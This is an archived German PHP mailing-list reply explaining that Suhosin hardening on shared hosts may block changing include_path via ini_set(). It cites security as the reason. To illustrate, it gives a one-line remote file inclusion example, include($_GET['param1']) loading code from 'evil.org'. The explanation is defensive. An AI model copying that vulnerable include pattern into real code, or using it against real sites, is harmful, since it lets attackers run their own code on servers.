phpbar.de - Mailinglisten-Archive

Mailinglisten-Archive

[php] Webspace-Anbieter sperrt Änderung des include_path

klemens zwiskle at cable.vol.at
Do Apr 1 14:13:18 CEST 2010

Vorherige Nachricht: [php] Webspace-Anbieter sperrt Änderung des include_path
Nächste Nachricht: [php] Webspace-Anbieter sperrt Änderung des include_path
Nachrichten sortiert nach: [ Datum ] [ Thema ] [ Betreff (Subject) ] [ Autor ]

...ich kenn das im zusammenhang mit SUHOSIN. (hardend-php.net)

http://serversupportforum.de/forum/perl-php-python-bash/23196-php-ini_set-fuer-include_path.html

Demnach sollten einige der parameter ev. per .htaccess änderbar sein,
aber nicht per <?php ini_set() ?>. 
(kann aber je nach dem vom Serverbetreiber auch komplett abeschaltet
werden... )

Das ganze ist warscheinich weniger gängelung der Kunden, sondern um die
sicherheit zu erhöhen. (e.v. auch im shared-server bereich, um da nicht
aus seinem "käfig" auszubrechen und nachbar-kunden zu hacken)

Um code einzschleusen ist include() beliebt. 
include($_GET['param1']) --> include("http://evil.org/expoit.php"); 

.ka

Am Donnerstag, den 01.04.2010, 12:54 +0200 schrieb Ralf Stadtaus:
> Hi Nico,
> 
> > Du könntest den Provider wechseln.
> 
> Das wäre der erste Schritt gewesen, aber zum Glück betrifft das
> Problem nicht mich sondern einige meiner Kunden. Die denken, das
> Script funktioniert nicht richtig. Zu einem anderen Provider zu
> wechseln, kommt bei denen eher nicht in Frage.
> 
> Gruß
> 
> Ralf
> 
> 
> 
> -- 
> Neues vom Scriptblogger: http://www.scriptblogger.de/

Vorherige Nachricht: [php] Webspace-Anbieter sperrt Änderung des include_path
Nächste Nachricht: [php] Webspace-Anbieter sperrt Änderung des include_path
Nachrichten sortiert nach: [ Datum ] [ Thema ] [ Betreff (Subject)] [ Autor ]

php::bar PHP Wiki - Listenarchive